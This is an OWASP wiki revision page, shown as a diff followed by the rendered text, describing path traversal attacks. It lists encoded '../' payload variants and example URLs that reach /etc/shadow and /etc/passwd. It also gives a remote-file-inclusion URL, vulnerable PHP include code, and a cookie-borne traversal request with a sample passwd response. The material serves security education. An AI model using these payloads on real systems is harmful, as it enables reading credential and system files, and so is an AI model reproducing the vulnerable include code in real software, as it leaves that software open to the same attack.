Difference between revisions of "Path Traversal"

From OWASP
Jump to: navigation, search
m (Examples)
Line 1: Line 1:
 
{{Template:Attack}}
 
{{Template:Attack}}
 +
  
 
==Description==
 
==Description==
Also refered to as 'Directory Traversal' this type of attack enables an attacker to move through the server directories, outside of the normal webroot. From there he is able to view critical system files, source codes and many other thingsHe could even carry out Cross Server attacks if he wishes.
+
 
 +
This attack aims to access files and directories that are stored outside web root folder. By browsing the application, one should look for absolute links to files stored on the web server and how this is done. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations it’s possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control.
 +
The idea is to use “../” sequences to move up to root directory, thus permitting to navigate thru file system.
 +
 
 +
This attack can be execute with a external malicious code injected on the path, the way of the [[Resource injection]] attack, but it’s a Path Traversal attack
 +
 
 +
This attack is also named of “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.
 +
 
 +
To perform this attack it’s not necessary to use a specific tool, but it’s recommended to use a spider/crawler to detect all URLs available.
 +
 
 +
 
 +
===Request variations ===
 +
 
 +
'''Encoding and double encoding:'''
 +
 
 +
  %2e%2e%2f represents ../
 +
%2e%2e/ represents ../
 +
..%2f represents ../
 +
%2e%2e%5c represents ..\
 +
%2e%2e\ represents ..\
 +
..%5c represents ..\
 +
%252e%252e%255c represents ..\
 +
..%255c represents ..\ and so on.
 +
 
 +
'''Unicode/UTF-8 Encoding (only for systems support UTF-8 sequences)'''
 +
 
 +
..%c0%af represents ../
 +
..%c1%9c represents ..\
 +
 
 +
 
 +
===OS specific===
 +
 
 +
;UNIX
 +
Root directory:  “ / “
 +
Directory separator: “ / “
 +
 
 +
;WINDOWS
 +
Root directory: “  <partition letter> : \ “
 +
Directory separator: “ / “ or “ \ ”
 +
 
  
 
==Examples ==
 
==Examples ==
An attacker approaches our hypothetical website 'bank.com'He browses the siteHe soon notices that the website uses GET requests in order to view pages.<br>
+
 
http://bank.com/index.php?page=transaction.php<br>
+
=== Example 1===
When viewing this link the page 'transaction.php' is called. The attacker tries a Path Traversal attack:<br>
+
In order to identify the possibility to execute this attack, it’s needed to observe how the application deals with the resources in use. The following examples show some situations.
http://bank.com/index.php?page=../../../../../../../../etc/shadow<br>
+
<nowiki> http://some_site.com.br/get-files.jsp?file=report.pdf </nowiki>
He now has access to the passwords.
+
<nowiki> http://some_site.com.br/get-page.php?home=aaa.html </nowiki>
 +
<nowiki> http://some_site.com.br/some-page.asp?page=index.html  </nowiki>
 +
 
 +
 
 +
In these examples it’s possible to insert a malicious string as the variable parameter to access files located outside the web publish directory. Ex:
 +
  <nowiki> http://some_site.com.br/get-files?file=../../../../some dir/some file </nowiki>
 +
Or
 +
  <nowiki> http://some_site.com.br/../../../../some dir/some file </nowiki>
 +
 
 +
The following URLs show examples of *NIX password file exploitation:
 +
 
 +
<nowiki>http://some_site.com.br/../../../../etc/shadow  </nowiki>
 +
<nowiki>http://some_site.com.br/get-files?file=/etc/passwd </nowiki>
 +
 
 +
 
 +
 
 +
Note: In a windows system an attacker can navigate only in a partition that locates web root while in the Linux he can navigate in all disc.
 +
 
 +
 
 +
===Example 2===
 +
It's also possible to include files, and scripts, located on external website,
 +
<nowiki> http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php   </nowiki>
 +
 
 +
 
 +
===Example 3===
 +
These examples illustrate a case when an attacker make the server show the CGI source code;
 +
<nowiki> http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi  </nowiki>
 +
 
 +
 
 +
=== Example 4===
 +
This example was extracted from: Wikipedia - Directory Traversal
 +
 
 +
A typical example of vulnerable application code is:
 +
 
 +
<pre><nowiki>
 +
<?php
 +
$template = 'blue.php';
 +
if ( is_set( $_COOKIE['TEMPLATE'] ) )
 +
  $template = $_COOKIE['TEMPLATE'];
 +
include ( "/home/users/phpguru/templates/" . $template );
 +
?>
 +
</nowiki></pre>
 +
 
 +
 
 +
 
 +
An attack againstthis system could be to send the following HTTP request:
 +
<pre>
 +
GET /vulnerable.php HTTP/1.0
 +
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
 +
</pre>
 +
 
 +
 
 +
Generating a server response such as:
 +
<pre>
 +
HTTP/1.0 200 OK
 +
Content-Type: text/html
 +
Server: Apache
 +
 
 +
root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh
 +
daemon:*:1:1::/tmp:
 +
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
 +
</pre>
 +
 
 +
 
 +
The repeated <tt>../</tt> characters after /home/users/phpguru/templates/ has caused
 +
[http://www.php.net/manual/en/function.include.php include()] to traverse to the root directory, and then include the UNIX password file [[passwd|/etc/passwd]].
 +
 
 +
 
 +
UNIX etc/passwd is a common file used to demonstrate '''directory traversal''', as it is often used by crackers to try cracking the passwords.
 +
 
 +
 
 +
==References==
 +
*http://cwe.mitre.org/data/definitions/22.html
 +
*http://www.webappsec.org/projects/threat/classes/path_traversal.shtml
 +
*http://cve.mitre.org/docs/plover/SECTION.9.6.html#PATH.TRAV
 +
 
  
 
==Related Threats==
 
==Related Threats==
 +
{{Template:Stub}}
 +
 +
[[: Category: Information Disclosure]]
 +
  
 
==Related Attacks==
 
==Related Attacks==
 +
*[[Path Manipulation]]
 +
*[[Relative Path Traversal]]
 +
*[[Resource Injection]]
 +
  
 
==Related Vulnerabilities==
 
==Related Vulnerabilities==
 +
[[:Category:Input Validation Vulnerability]]
 +
  
 
==Related Countermeasures==
 
==Related Countermeasures==
 +
[[:Category:Input Validation]]
  
==Categories==
 
  
 +
==Categories==
 
{{Template:Stub}}
 
{{Template:Stub}}
  
[[Category:File System]]
+
[[:Category: Resource Manipulation]]

Revision as of 08:05, 27 July 2007

This is an Attack. To view all attacks, please see the Attack Category page.



Description

This attack aims to access files and directories that are stored outside web root folder. By browsing the application, one should look for absolute links to files stored on the web server and how this is done. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations it’s possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control. The idea is to use “../” sequences to move up to root directory, thus permitting to navigate thru file system.

This attack can be execute with a external malicious code injected on the path, the way of the Resource injection attack, but it’s a Path Traversal attack

This attack is also named of “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.

To perform this attack it’s not necessary to use a specific tool, but it’s recommended to use a spider/crawler to detect all URLs available.


Request variations

Encoding and double encoding:

%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../ 
%2e%2e%5c represents ..\
%2e%2e\ represents ..\ 
..%5c represents ..\ 
%252e%252e%255c represents ..\ 
..%255c represents ..\ and so on. 

Unicode/UTF-8 Encoding (only for systems support UTF-8 sequences)

..%c0%af represents ../ 
..%c1%9c represents ..\ 


OS specific

UNIX
Root directory:  “ / “ 
Directory separator: “ / “
WINDOWS
Root directory: “  <partition letter> : \ “
Directory separator: “ / “ or “ \ ” 


Examples

Example 1

In order to identify the possibility to execute this attack, it’s needed to observe how the application deals with the resources in use. The following examples show some situations.

 http://some_site.com.br/get-files.jsp?file=report.pdf  
 http://some_site.com.br/get-page.php?home=aaa.html  
 http://some_site.com.br/some-page.asp?page=index.html  


In these examples it’s possible to insert a malicious string as the variable parameter to access files located outside the web publish directory. Ex:

  http://some_site.com.br/get-files?file=../../../../some dir/some file 

Or

  http://some_site.com.br/../../../../some dir/some file 

The following URLs show examples of *NIX password file exploitation:

http://some_site.com.br/../../../../etc/shadow  
http://some_site.com.br/get-files?file=/etc/passwd 


Note: In a windows system an attacker can navigate only in a partition that locates web root while in the Linux he can navigate in all disc.


Example 2

It's also possible to include files, and scripts, located on external website,

 http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php   


Example 3

These examples illustrate a case when an attacker make the server show the CGI source code;

 http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi   


Example 4

This example was extracted from: Wikipedia - Directory Traversal

A typical example of vulnerable application code is:

<?php
$template = 'blue.php';
if ( is_set( $_COOKIE['TEMPLATE'] ) )
   $template = $_COOKIE['TEMPLATE'];
include ( "/home/users/phpguru/templates/" . $template );
?>


An attack againstthis system could be to send the following HTTP request:

GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd


Generating a server response such as:

HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh 
daemon:*:1:1::/tmp: 
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh


The repeated ../ characters after /home/users/phpguru/templates/ has caused include() to traverse to the root directory, and then include the UNIX password file /etc/passwd.


UNIX etc/passwd is a common file used to demonstrate directory traversal, as it is often used by crackers to try cracking the passwords.


References


Related Threats

This article is a stub. You can help OWASP by expanding it or discussing it on its Talk page. Category: Information Disclosure


Related Attacks


Related Vulnerabilities

Category:Input Validation Vulnerability


Related Countermeasures

Category:Input Validation


Categories

This article is a stub. You can help OWASP by expanding it or discussing it on its Talk page.Category: Resource Manipulation